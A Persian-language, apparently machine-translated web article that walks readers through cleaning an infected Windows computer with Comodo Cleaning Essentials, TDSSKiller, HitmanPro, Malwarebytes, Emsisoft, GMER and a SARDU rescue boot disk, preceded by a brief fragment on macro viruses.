علاوه بر این، تهدید اغلب به راحتی به صورت بصری شناسایی می شود. توسعه دهندگان آنها معمولاً در برگه "خلاصه" اطلاعاتی مانند نام ابزار، دسته بندی، موضوع نظر و نام نویسنده را نشان می دهند که به لطف آنها می توانید بسیار سریعتر و آسان تر از شر یک ویروس ماکرو خلاص شوید. می توانید با استفاده از منوی زمینه آن را فراخوانی کنید.
روش های حذف
وقتی فایل یا سند مشکوکی پیدا کردید، ابتدا آن را با یک آنتی ویروس اسکن کنید. اگر تهدیدی شناسایی شود، آنتی ویروس ها سعی می کنند آن را درمان کنند و در صورت عدم موفقیت، دسترسی به آن را به طور کامل مسدود می کنند.
اگر کل رایانه آلوده شده است، باید از دیسک بوت اضطراری استفاده کنید که حاوی یک آنتی ویروس با آخرین پایگاه داده است. هارد دیسک شما را اسکن می کند و تمام تهدیداتی را که پیدا می کند خنثی می کند.
اگر نمی توانید از این طریق از خود محافظت کنید، آنتی ویروس شما نمی تواند کاری انجام دهد، و دیسک نجاتنه، پس باید روش درمان "دستی" را امتحان کنید:
به این ترتیب، ویروس ماکرو را از سند آلوده حذف می کنید، اما این به هیچ وجه به این معنی نیست که در سیستم باقی نمی ماند. به همین دلیل است که توصیه می شود کل را اسکن کنید کامپیوتر شخصیو تمام اطلاعات آن با آنتی ویروس یا (مزیت آنها این است که نیازی به نصب ندارند).
فرآیند درمان و تمیز کردن رایانه از آلودگی با ویروس های ماکرو بسیار پیچیده است، بنابراین بهتر است در مراحل اولیه از عفونت جلوگیری کنید.
به این ترتیب از خود محافظت خواهید کرد و ویروس های ماکرو هرگز به فایل های مربوطه نفوذ نخواهند کرد.
ویدئویی در مورد پاکسازی سیستم شما از ویروس ها
با استفاده از نکاتی در مورد "چگونه کامپیوتر آلوده را تمیز کنیم" ارائه شده در این مقاله، می توانید هر نوع بدافزاری را از رایانه خود حذف کرده و آن را به شرایط کار
1. مطمئن شوید که رایانه شما واقعاً آلوده است
قبل از اینکه سعی کنید هر گونه عفونت را از رایانه خود حذف کنید، باید مطمئن شوید که رایانه واقعاً آلوده شده است. برای انجام این کار، لطفاً به توصیه هایی که در مقاله "" می دهم مراجعه کنید. اگر واقعاً نشان می دهد که رایانه شما آلوده شده است، مراحل را در بخش بعدی ادامه دهید. مطمئن شوید که آنها را به ترتیب مناسب انجام می دهید.
2. چگونه کامپیوتر خود را تمیز کنید و مطمئن شوید که واقعا تمیز است
لطفاً توجه داشته باشید که کاربران حرفهای در اینجا میتوانند به سادگی به آخرین بخش مربوط به آن بپردازند و بر اساس آن رایانه را تمیز کنند. این موثرترین روش است، اما همچنین یکی از زمان برترین روشها است. با این حال، در صورت لزوم، می توانید مستقیماً به آن بخش بروید و اگر عفونت به طور کامل برطرف نشد، دوباره به ابتدا برگردید.
2.1 تمیز کردن رایانه با استفاده از CCE و TDSSKiller
Comodo Cleaning Essentials (CCE) را از این صفحه دانلود کنید. مطمئن شوید که نسخه صحیح سیستم عامل خود را انتخاب کرده اید. اگر مطمئن نیستید که رایانه شما از سیستم عامل 32 بیتی یا 64 بیتی استفاده می کند، ببینید. همچنین دانلود کنید Kaspersky TDSSKillerاز این صفحه اگر نمی توانید هر یک از این برنامه ها را دانلود کنید یا اگر اتصال اینترنت شما کار نمی کند، باید این کار را با استفاده از رایانه دیگری انجام دهید و با استفاده از درایو فلش آن را به رایانه آلوده منتقل کنید. اطمینان حاصل کنید که هیچ فایل دیگری در درایو فلش وجود ندارد. مراقب دستگاه فلش باشید زیرا بدافزار وقتی آن را در رایانه خود قرار می دهید می تواند آن را آلوده کند. بنابراین، پس از انتقال این برنامه ها، آن را به هیچ کامپیوتر دیگری متصل نکنید. ضمناً اشاره کنم که هر دو برنامه قابل حمل هستند. این بدان معناست که پس از اتمام استفاده از آنها، نیازی به حذف آنها نخواهید داشت. فقط پوشه های آنها را حذف کنید و حذف خواهند شد.
پس از دانلود CCE، فایل را از حالت فشرده خارج کنید، پوشه را باز کنید و روی فایلی که نام آن "CCE" است دوبار کلیک کنید. پنجره اصلی باز خواهد شد برنامه های کومودوملزومات تمیز کردن اگر باز نشد، کلید Shift را فشار داده و نگه دارید و روی فایلی با نام "CCE" دوبار کلیک کنید. هنگامی که CCE با موفقیت باز شد، می توانید کلید Shift را رها کنید. با این حال، تا زمانی که برنامه به طور کامل در حافظه بارگذاری نشده است، آن را آزاد نکنید. اگر حداقل در هنگام UAC آن را رها کنید، حتی با روش اجباری نیز نمی تواند به درستی باز شود. نگه داشتن Shift به باز کردن آن حتی در رایانههایی که به شدت آلوده هستند کمک میکند. این کار را با سرکوب بسیاری از فرآیندهای غیرضروری که می توانند از اجرای آن جلوگیری کنند، انجام می دهد. اگر باز هم به اجرای آن کمکی نکرد، برنامه ای به نام RKill را دانلود و اجرا کنید. از این صفحه قابل دانلود است. این برنامه فرآیندهای مخرب شناخته شده را متوقف می کند. بنابراین، پس از راه اندازی، CCE باید به طور کامل راه اندازی شود.
پس از راهاندازی، اسکن هوشمند را در CCE اجرا کنید ( اسکن هوشمند) و هر چیزی را که می یابد قرنطینه کند. این برنامه همچنین به دنبال تغییرات سیستمی است که ممکن است توسط بدافزار ایجاد شده باشد. آنها در نتایج نشان داده خواهند شد. من توصیه می کنم به برنامه اجازه دهید این مشکل را نیز برطرف کند. هنگامی که از شما خواسته شد رایانه خود را مجدداً راه اندازی کنید. پس از راه اندازی مجدد رایانه، Kaspersky TDSSKiller را راه اندازی کنید، آنچه را که پیدا می شود اسکن و قرنطینه کنید.
همچنین، اگر اتصال اینترنت شما قبلاً کار نمی کرد، بررسی کنید که آیا اکنون کار می کند یا خیر. اتصال اینترنتی معتبر مورد نیاز است مراحل بعدیاین بخش.
هنگامی که اسکن CCE کامل شد و مطمئن شدید که اتصال اینترنت شما کار می کند، دوباره CCE را باز کنید. امیدواریم این بار باز شود، اما اگر باز نشد، با نگه داشتن کلید Shift آن را باز کنید. سپس از منوی "Tools" در CCE، KillSwitch را باز کنید. در KillSwitch در منوی «View» گزینه «Hide Safe Processes» را انتخاب کنید. سپس کلیک کنید کلیک راستروی تمام فرآیندهایی که به عنوان مشکوک یا خطرناک علامت گذاری شده اند و گزینه حذف آنها را انتخاب کنید. همچنین باید روی هر فرآیند ناشناخته ای که باقی مانده است کلیک راست کرده و گزینه "Kill Process" را انتخاب کنید. فرآیندهای علامت گذاری شده به عنوان FLS.Unknown را حذف نکنید.بعد، در CCE، از منوی ابزار، Autorun Analyzer را راه اندازی کنید و گزینه "Hide Safe Entries" را از منوی "View" انتخاب کنید. سپس هر موردی را غیرفعال کنید متعلق به فایل ها، که به عنوان مشکوک یا خطرناک علامت گذاری شده اند. می توانید این کار را با برداشتن تیک کادرهای کنار آیتم ها انجام دهید. همچنین باید مواردی را که بهعنوان FLS.Unknown علامتگذاری شدهاند، اما فکر میکنید احتمالاً بدافزار هستند، غیرفعال کنید. هیچ موردی را حذف نکنید.
اکنون کامپیوتر خود را ریستارت کنید. پس از راه اندازی مجدد، با استفاده از توصیه هایی که در مقاله "" می دهم، رایانه خود را دوباره بررسی کنید. اگر همه چیز خوب است، می توانید به بخش " " بروید. به یاد داشته باشید که ورودی های رجیستری غیرفعال خطرناک نیستند. همچنین، توجه داشته باشید که حتی اگر کامپیوتر شما تمیز باشد عفونت های فعال، ممکن است هنوز قطعات بدافزاری روی آن وجود داشته باشد. آنها خطرناک نیستند، اما اگر اسکن با برنامه دیگری همچنان بدافزار را در رایانه شما پیدا کند، تعجب نکنید. اینها بقایای خفته چیزی هستند که شما همین الان حذف کردید. اگر از وجود این باقیمانده ها در رایانه خود ناراضی هستید، می توانید اکثریت قریب به اتفاق آنها را با اسکن با برنامه های ذکر شده در قسمت بعدی حذف کنید.
با این حال، اگر رایانه شما هنوز از آلودگی های فعال پاک نشده است، اما حداقلیکی از برنامه ها توانست شروع شود، دوباره مراحل توضیح داده شده در این بخش را طی کنید و ببینید که آیا با این کار عفونت ها برطرف می شود یا خیر. اما، اگر هیچ یک از برنامه ها نتوانستند شروع به کار کنند، لطفاً به آن بروید بخش بعدی. علاوه بر این، حتی اگر دنبال کردن مجدد دستورالعملهای این بخش برای تمیز کردن رایانه کافی نیست، باید به بخش بعدی بروید.
2.2 اگر رایانه شما هنوز تمیز نیست، با استفاده از HitmanPro، Malwarebytes و Emsisoft Anti-Malware اسکن کنید.
اگر مراحل بالا به از بین بردن کامل عفونت کمک نکرد، باید HitmanPro را از این صفحه دانلود کنید. برنامه را نصب کرده و "Default Scan" را اجرا کنید. اگر نصب نشد، به پاراگراف بعدی بروید و Malwarebytes را نصب کنید. وقتی در حین نصب HitmanPro از شما خواسته شد، توصیه میکنم گزینه فقط اجرا را انتخاب کنید چک یکبارهکامپیوتر. این باید برای اکثر کاربران مناسب باشد. همچنین اگر بدافزار از آن جلوگیری کند راه اندازی صحیح، سپس با نگه داشتن کلید CTRL برنامه را باز کنید تا در حافظه بارگذاری شود. هر گونه هجومی را که پیدا کرد قرنطینه کنید. به خاطر داشته باشید که این برنامه تنها تا 30 روز پس از نصب قادر به حذف عفونت ها خواهد بود. در حین حذف از شما خواسته می شود مجوز آزمایشی خود را فعال کنید.
هنگامی که HitmanPro تمام عفونت های شناسایی شده را حذف کرد، یا اگر Hitman Proنصب نشد، باید دانلود کنید نسخه رایگان Malwarebytes از این صفحه. توجه داشته باشید که دارای فناوری آفتاب پرست است که می تواند به نصب آن حتی بر روی رایانه های به شدت آلوده کمک کند. من به شما توصیه می کنم که در حین نصب، علامت کادر "فعال کردن دوره آزمایشی رایگان" را بردارید Malwarebytes Anti-Malware Pro" ("فعال کردن آزمایشی رایگان Malwarebytes Anti-Malware Pro"). مطمئن شوید که برنامه به طور کامل به روز شده است و سپس اجرا کنید اسکن سریع. هر گونه عفونتی را که پیدا کرد قرنطینه کنید. اگر برنامهای از شما میخواهد رایانه خود را مجدداً راهاندازی کنید، حتماً آن را مجدداً راهاندازی کنید.
سپس Emsisoft Emergency Kit را از این صفحه دانلود کنید. پس از اتمام دانلود، محتویات فایل فشرده را استخراج کنید. سپس بر روی فایلی با نام "start" دوبار کلیک کرده و "Emergency Kit Scanner" را باز کنید. هنگامی که از شما خواسته شد، به برنامه اجازه دهید تا پایگاه داده را به روز کند. پس از به روز رسانی، به منوی امنیت بازگردید. سپس به «تأیید» بروید و «سریع» را انتخاب کنید، سپس روی «تأیید» کلیک کنید. پس از تکمیل اسکن، تمام موارد شناسایی شده را قرنطینه کنید. هر زمان که نیاز دارید رایانه خود را مجدداً راه اندازی کنید.
پس از اسکن کامپیوتر خود با این برنامه ها، باید آن را مجددا راه اندازی کنید. سپس با استفاده از نکاتی که در مقاله "" ارائه می کنم، رایانه خود را دوباره بررسی کنید. اگر همه چیز خوب است، می توانید به بخش " " بروید. به یاد داشته باشید که ورودی های رجیستری غیرفعال خطرناک نیستند. با این حال، اگر رایانه شما هنوز تمیز نیست، مراحل این بخش را دوباره طی کنید و ببینید که آیا به حذف عفونت ها کمک می کند یا خیر. اگر برنامه های بخش 2.1 قبلاً نمی توانستند به درستی اجرا شوند، باید به عقب برگردید و دوباره آنها را اجرا کنید. اگر هیچ یک از برنامه های فوق قادر به راه اندازی نبودند، بوت شوید حالت امنشبکه فعال است و از آنجا اسکن کنید. با این حال، اگر آنها توانستند به درستی شروع کنند و تهدیدها حتی پس از پیروی مجدد از توصیه های این بخش همچنان باقی می ماند، می توانید به بخش بعدی بروید.
2.3 در صورت لزوم، این روش های کمتر سریع را امتحان کنید
اگر اقدامات فوق آلودگی را به طور کامل از بین نبرد، احتمالاً دستگاه شما محل ابتلا به عفونت بسیار بی پاسخی است. بد افزار. بنابراین، روشهای مورد بحث در این بخش بسیار قویتر هستند، اما به زمان بیشتری نیاز دارند. اولین کاری که توصیه می کنم انجام دهید این است که کامپیوتر خود را با یک اسکنر آنتی روت کیت دیگر به نام GMER اسکن کنید. از این صفحه قابل دانلود است. هر چیزی را که به رنگ قرمز سایه می اندازد را بردارید. مطمئن شوید که بلافاصله پس از اینکه برنامه تجزیه و تحلیل سریع سیستم خود را به پایان رساند، دکمه Scan را کلیک کنید. علاوه بر این، اگر از یک سیستم عامل 32 بیتی استفاده می کنید، باید اسکنر و ابزار حذف روت کیت ZeroAccess را دانلود کنید. اطلاعات مربوط به این روت کیت و پیوندی به برنامه ای برای حذف آن از سیستم های 32 بیتی را می توانید در اینجا بیابید. AntiZeroAccess را می توانید از لینک پاراگراف دوم دانلود کنید.
پس از اسکن در برنامه های فوق، کاری که باید انجام دهید این است که CCE را باز کنید، به تنظیمات بروید و گزینه "Scan for Sususious MBR modification" را انتخاب کنید. سپس روی "OK" کلیک کنید. اکنون در CCE، یک اسکن کامل انجام دهید. در صورت لزوم راه اندازی مجدد کنید و هر چیزی را که پیدا شد قرنطینه کنید. لطفاً توجه داشته باشید که این گزینه می تواند نسبتاً خطرناک باشد زیرا ممکن است مشکلاتی را در جایی که وجود ندارد آشکار کند. با احتیاط از آن استفاده کنید و مطمئن شوید که از همه چیز مهم قبلاً نسخه پشتیبان تهیه شده است. لطفاً توجه داشته باشید که در موارد نادر، اسکن با این گزینه ها ممکن است سیستم را غیر قابل بوت کند. این به ندرت اتفاق می افتد، اما حتی اگر اتفاق بیفتد، قابل تعمیر است. اگر پس از اجرای این اسکن، رایانه شما شروع به کار نکرد، از دیسک نصب ویندوز برای انجام بازیابی سیستم استفاده کنید. این باید به راه اندازی مجدد رایانه شما کمک کند.
هنگامی که CCE به طور کامل به پایان رسید، CCE را دوباره در حالی که نگه دارید باز کنید کلیدهای SHIFT. این عمل بیشتر تکمیل خواهد شد فرآیندهای غیر ضروری، که ممکن است مانع از اسکن شما شود. سپس KillSwitch را باز کنید، به منوی "View" بروید و "Hide Safe Processes" را انتخاب کنید. اکنون، دوباره تمام فرآیندهای خطرناک را حذف کنید. سپس، همچنین باید بر روی تمام فرآیندهای ناشناخته باقی مانده کلیک راست کرده و "Kill Process" را انتخاب کنید. آنها را حذف نکنید.شما باید توصیه های این پاراگراف را هر بار که رایانه خود را مجدداً راه اندازی می کنید دنبال کنید تا مطمئن شوید که اسکن های بعدی تا حد امکان مؤثر هستند.
پس از تکمیل تمام فرآیندهایی که قابل اعتماد تلقی نمی شدند، باید برنامه HitmanPro را در حین نگه داشتن باز کنید کلیدهای CTRL. سپس «پیشفرض اسکن» را اجرا کنید و هر چیزی را که پیدا میکند قرنطینه کنید. سپس اسکن کامل را در Malwarebytes و Emsisoft Emergency Kit اجرا کنید. آنچه را که پیدا می کنند قرنطینه کنید. پس از آن نسخه رایگان SUPERAntiSpyware را از این صفحه دانلود کنید. در هنگام نصب بسیار مراقب باشید زیرا برنامه های دیگری همراه با نصب کننده وجود دارد. در صفحه اول، حتما تیک هر دو گزینه مربوطه را بردارید نصب های گوگلکروم. اکنون گزینه "Custom Install" را انتخاب کنید. در حین نصب سفارشی، باید یک بار دیگر تیک دو چک باکس را از گزینه add بردارید گوگل کروم.
جدا از این، برنامه به خوبی نصب خواهد شد. هنگامی که از شما خواسته شد تا یک دوره آزمایشی رایگان را شروع کنید، به شما توصیه می کنم رد کنید. پس از بارگذاری کامل برنامه، گزینه Complete Scan را انتخاب کرده و روی دکمه "Scan your Computer..." کلیک کنید. سپس روی دکمه "شروع کامل اسکن>" کلیک کنید. فایل های شناسایی شده را حذف کنید و در صورت لزوم کامپیوتر خود را مجددا راه اندازی کنید.
پس از انجام این مراحل، باید کامپیوتر خود را مجددا راه اندازی کنید. سپس با استفاده از توصیه ای که در مقاله "" ارائه می کنم، آن را دوباره تست کنید. اگر همه چیز خوب است، می توانید به بخش " " بروید. به یاد داشته باشید که ورودی های رجیستری غیرفعال خطرناک نیستند. با این حال، اگر رایانه شما هنوز تمیز نشده است، مراحل توضیح داده شده در این بخش را دوباره دنبال کنید و ببینید آیا این به از بین بردن عفونت کمک می کند یا خیر. اگر نه، پس باید به بخش بعدی بروید.
2.4 در صورت لزوم، یک دیسک بوت بسازید
اگر روش های فوق به طور کامل عفونت را از بین نبرد، یا اگر حتی نمی توانید رایانه خود را بوت کنید، برای تمیز کردن رایانه خود ممکن است به یک سی دی (یا فلش درایو) قابل بوت نیاز داشته باشید که به آن دیسک بوت نیز می گویند. می دانم که همه اینها ممکن است کار زیادی به نظر برسد، اما در واقع آنقدرها هم بد نیست. فقط به یاد داشته باشید که باید این دیسک را روی رایانه ای ایجاد کنید که آلوده نباشد. در غیر این صورت ممکن است فایل ها آسیب دیده یا حتی آلوده شوند.
از آنجایی که این یک درایو بوت است، هیچ بدافزاری نمی تواند از آن پنهان شود، آن را غیرفعال کند یا به هیچ وجه در عملکرد آن دخالت کند. بنابراین، اسکن کردن در برنامه های مختلف به این روش باید به شما امکان دهد تقریباً هر دستگاهی را بدون توجه به اینکه چقدر آلوده باشد تمیز کنید. تنها استثنا در اینجا این است که خود دستگاه آلوده شده باشد فایل های سیستمی. در این صورت، حذف عفونت ممکن است به سیستم آسیب برساند. عمدتاً به همین دلیل است که شما همه چیز را رزرو کرده اید اسناد مهمقبل از شروع فرآیند تمیز کردن با این حال، گاهی اوقات می توانید با پیروی از توصیه هایی که در زیر ارائه می کنم، از این موضوع دور شوید.
برای این کار باید دانلود کنید. این یک برنامه عالی است که به شما امکان می دهد یک دیسک قابل بوت را با چندین برنامه آنتی ویروس ایجاد کنید. او همچنین بسیاری دیگر را دارد توابع مفید، که در این مقاله به آن نمی پردازم. چندین کتاب درسی بسیار مفید برای SARDU در این صفحه یافت می شود. بسیار مراقب باشید پیشنهادات اضافی، اکنون در نصب کننده گنجانده شده است. متأسفانه، این برنامه در حال حاضر سعی دارد از افراد کلاهبرداری کند تا برنامه های اضافی را نصب کنند که عمدتاً غیر ضروری هستند.
پس از دانلود، محتویات را از حالت فشرده خارج کرده و پوشه SARDU را باز کنید. سپس فایل اجرایی را اجرا کنید که با سیستم عامل شما مطابقت دارد - sardu یا sardu_x64. در تب آنتی ویروس، روی برنامه های آنتی ویروسی که می خواهید روی دیسکی که در حال ایجاد آن هستید بنویسید کلیک کنید. شما می توانید به مقدار دلخواه یا کم اضافه کنید. توصیه می کنم کامپیوتر خود را حداقل با Dr.Web LiveCD، Avira Rescue System و Kaspersky Rescue Disk اسکن کنید. یکی از چیزهای خوب در مورد Dr.Web این است که گاهی اوقات به شما امکان می دهد به جای حذف ساده، یک فایل آلوده را با نسخه تمیز آن جایگزین کنید. این به شما کمک می کند برخی از رایانه ها را بدون آسیب رساندن به سیستم پاک کنید. بنابراین، من به شدت توصیه می کنم Dr.Web را در درایو بوت خود قرار دهید.
با کلیک بر روی نام های مختلف برنامه های آنتی ویروساغلب شما را به صفحه ای هدایت می کند که از آن می توانید یک تصویر ISO را با آنتی ویروس مناسب دانلود کنید. گاهی اوقات به شما این امکان داده می شود که مستقیماً از طریق SARDU آن را دانلود کنید، که می توانید آن را در زبانه Downloader پیدا کنید. در صورت انتخاب، همیشه گزینه دانلود ISO را انتخاب کنید. همچنین پس از دانلود فایل ISOممکن است لازم باشد آن را به پوشه ISO واقع در پوشه اصلی SARDU منتقل کنید. هنگامی که تصاویر ISO همه موارد مورد نیاز خود را جابجا کردید محصولات آنتی ویروسدر پوشه ISO، آماده ایجاد یک دیسک بوت اضطراری هستید. برای این کار به تب Antivirus رفته و مطمئن شوید که تمام آنتی ویروس هایی که انتخاب کرده اید تیک خورده باشند. اکنون روی دکمه کلیک کنید تا یک دستگاه USB یا یک دیسک ایجاد شود. هر یک از این گزینه ها قابل قبول خواهد بود. این فقط به نحوه اجرای دیسک نجات بستگی دارد - از USB یا از CD.
پس از ایجاد یک دیسک نجات، احتمالاً باید دنباله بوت را در تنظیمات BIOS خود تغییر دهید تا اطمینان حاصل کنید که وقتی یک CD قابل بوت یا فلش قابل بوت را وارد می کنید، رایانه آن را بوت نمی کند و نه سیستم عامل، مثل همیشه. برای اهداف ما، باید ترتیب را به گونهای تنظیم کنید که اگر میخواهید از سیدی یا دیویدی بوت شود، «درایو رام CD/DVD» یا اگر میخواهید از درایو فلش بوت شود، «دستگاههای قابل جابجایی» اول باشد. پس از انجام این کار، کامپیوتر خود را از دیسک نجات بوت کنید.
پس از بوت شدن از دیسک، می توانید انتخاب کنید که با کدام آنتی ویروس می خواهید کامپیوتر خود را اسکن کنید. همانطور که قبلاً اشاره کردم، توصیه می کنم با Dr.Web شروع کنید. وقتی این برنامه تمام شد و همه چیزهایی را که پیدا کرد بازیابی یا حذف کردید، باید رایانه خود را خاموش کنید. سپس مطمئن شوید که دوباره از دیسک بوت شده و سپس اسکن را با آنتی ویروس های دیگر ادامه دهید. این روند را تا زمانی ادامه دهید که کامپیوتر خود را با تمام برنامه های آنتی ویروسی که در دیسک بوت قرار داده اید اسکن کنید.
پس از تمیز کردن رایانه خود در برنامه هایی که روی دیسک رایت کرده اید، اکنون باید ویندوز را دوباره راه اندازی کنید. اگر رایانه میتواند تحت ویندوز راهاندازی شود، با استفاده از دستورالعملهایی که در مقاله ارائه میدهم، آن را بررسی کنید. اگر همه چیز خوب است، می توانید به بخش " " بروید. به یاد داشته باشید که ورودی های رجیستری غیرفعال نمی تواند خطری ایجاد کند.
اگر رایانه شما هنوز تمیز نشده است، اما می توانید از ویندوز بوت شوید، به شما توصیه می کنم در حالی که در ویندوز هستید آن را تمیز کنید، با این مقاله شروع کنید و روش های پیشنهادی را دنبال کنید. با این حال، اگر رایانه شما هنوز نمی تواند به ویندوز بوت شود، دوباره سعی کنید با استفاده از دیسک نصب ویندوز، آن را مرتب کنید. این باید به راه اندازی مجدد رایانه شما کمک کند. اگر حتی این به بوت شدن آن کمک نمی کند، آنتی ویروس های بیشتری را به دیسک بوت اضطراری اضافه کنید و سپس کامپیوتر را دوباره اسکن کنید. اگر انجام این کار باز هم کمکی نکرد، بخوانید.
3. اگر روش های فوق به تمیز کردن رایانه شما کمک نکرد، چه باید کرد
اگر تمام مراحل بالا را دنبال کرده اید و هنوز نمی توانید رایانه خود را پاکسازی کنید، اما متقاعد شده اید که بدافزار باعث ایجاد این مشکلات می شود، بسیار سپاسگزار خواهیم بود اگر نظر خود را بگذارید و توضیح دهید که برای پاکسازی چه کاری انجام داده اید. رایانه شما و علائم باقی مانده که باعث می شود فکر کنید رایانه هنوز تمیز نشده است. این برای بهبود این مقاله بسیار مهم است. واقعا امیدوارم هیچ کس هرگز به این بخش نرسد. هدف از این مقاله این است که به شما این فرصت را بدهد که کامپیوتر آلوده خود را به طور کامل پاکسازی کنید.
همچنین می توانید از یک انجمن تخصصی که به حذف بدافزار اختصاص داده شده است، مشاوره بگیرید. یک انجمن بسیار مفید، که شریک ما است -. با این حال، اگر حتی پس از درخواست کمک در یک انجمن حذف بدافزار، رایانه شما هنوز از آن خالی نیست بد افزار، ممکن است لازم باشد رایانه خود را فرمت کنید و آن را به این صورت اجرا کنید. این بدان معناست که هر چیزی را که از قبل کپی نکرده اید از دست خواهید داد. اگر این کار را کردید، حتما درست کنید قالب بندی کاملکامپیوتر شما قبل از نصب مجدد ویندوز این تقریباً هر نوع بدافزاری را از بین می برد. پس از نصب مجدد ویندوز، مراحل زیر را دنبال کنید.
4. بعد از اینکه همه بدافزارها در نهایت برای حذف شناسایی شدند، چه باید کرد
هنگامی که از تمیز بودن رایانه خود مطمئن شدید، اکنون می توانید سعی کنید هر چیزی را که از دست داده اید بازیابی کنید. می توانید از ابزار Windows Repair (All In One) استفاده کنید - یک ابزار همه کاره که به شما امکان می دهد تعمیر کنید تعداد زیادی ازمعروف مشکلات ویندوزاز جمله خطاهای رجیستری، مجوزهای فایل، اینترنت اکسپلورر، به روز رسانی ویندوز، دیوار آتش ویندوز. اگر پس از انجام تمام مراحل، رایانه شما به طور عادی کار می کند، می توانید Comodo Autorun Analyzer را نیز باز کنید و گزینه حذف موارد رجیستری را که قبلاً فقط غیرفعال کرده بودید، انتخاب کنید. بنابراین، آنها دیگر به هیچ وجه روی رایانه شما نخواهند بود.
هنگامی که به طور ایمن همه عفونت ها را از رایانه خود حذف کردید و اثرات مخرب باقی مانده را از بین بردید، باید اقداماتی را انجام دهید تا اطمینان حاصل کنید که این اتفاق دیگر تکرار نمی شود. به همین دلیل، من راهنمای نحوه ایمن ماندن آنلاین (به زودی در وب سایت ما) نوشته ام. لطفاً بعداً آن را بخوانید و روشهایی را که فکر میکنید به بهترین نحو با نیازهای شما مطابقت دارد، اجرا کنید.
پس از ایمن سازی رایانه خود، اکنون می توانید هر یک از فایل های از دست رفته در طی فرآیند پاکسازی را که قبلاً از آنها نسخه پشتیبان تهیه شده بود، بازیابی کنید. امیدواریم مجبور نباشید این مرحله را انجام دهید. همچنین، قبل از بازیابی آنها، مطمئن شوید که رایانه شما به خوبی محافظت شده است. اگر به اندازه کافی از رایانه خود محافظت نکنید، ممکن است به طور تصادفی آن را آلوده کنید و سپس باید دوباره آن را تمیز کنید. بهعلاوه، اگر از یک دستگاه USB برای انتقال فایلها به رایانه آلوده استفاده کردهاید، اکنون میتوانید آن را دوباره به رایانه وارد کنید و مطمئن شوید که هیچ بدافزاری روی آن وجود ندارد. توصیه میکنم این کار را با حذف فایلهای باقیمانده روی آن انجام دهید.
اشتباه تایپی پیدا کردید؟ Ctrl + Enter را فشار دهید
